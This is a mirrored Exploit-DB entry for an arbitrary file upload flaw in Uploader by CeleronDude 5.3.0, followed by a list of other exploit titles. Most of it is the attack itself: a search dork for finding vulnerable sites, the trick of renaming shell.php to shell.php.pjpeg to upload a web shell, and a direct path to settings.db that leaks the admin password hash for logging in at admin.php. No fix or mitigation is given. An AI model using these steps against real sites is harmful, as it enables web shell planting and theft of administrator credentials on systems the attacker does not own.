Uploader by CeleronDude 5.3.0 – Arbitrary File Upload (2)

Exploit Database
15 阅读

作者： Stink'

日期： 2010-01-17
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11166/

#############################
Uploader by CeleronDude 5.3.0 - Upload Vulnerability
Discovered by : Stink'
Date : 2009-12-17 for upload. 2010-01-17 for Settings.db retrieve password.

Dork : "Uploader by CeleronDude."
Website Publisher : <a href="http://www.celerondude.com/php-uploader-v5">http://www.celerondude.com/php-uploader-v5</a>
#############################

-- [Upload Vulnerability] --
Rename your shell.php in shell.php.pjpeg and Upload !

-- [Retrieve Password] --

Go to : http://site.com/[path]/data/settings.db

"admin_password";s:32:"468f7b0aaba9a806a0ce5bc4d4482164"

and go http://site.com/[path]/admin.php :)

last Exploits
Uploader by CeleronDude 5.3.0 – Arbitrary File Upload (2)的更多信息

Intellinet IP Camera MNC-L10 – Authentication Bypass：
Secutech RiS-11/RiS-22/RiS-33 – Remote DNS Change：
Online Quiz Maker 1.0 – ‘catid’ SQL Injection：
E-Sic Software livre CMS – ‘f’ SQL Injection：
PRO-7070 Hazır Profesyonel Web Sitesi 1.0 – Authentication Bypass：
Ananda Real Estate 3.4 – ‘list.asp’ Multiple SQL Injections：
Meeplace Business Review Script – ‘id’ SQL Injection：
CodeMeter 6.50 – Cross-Site Scripting：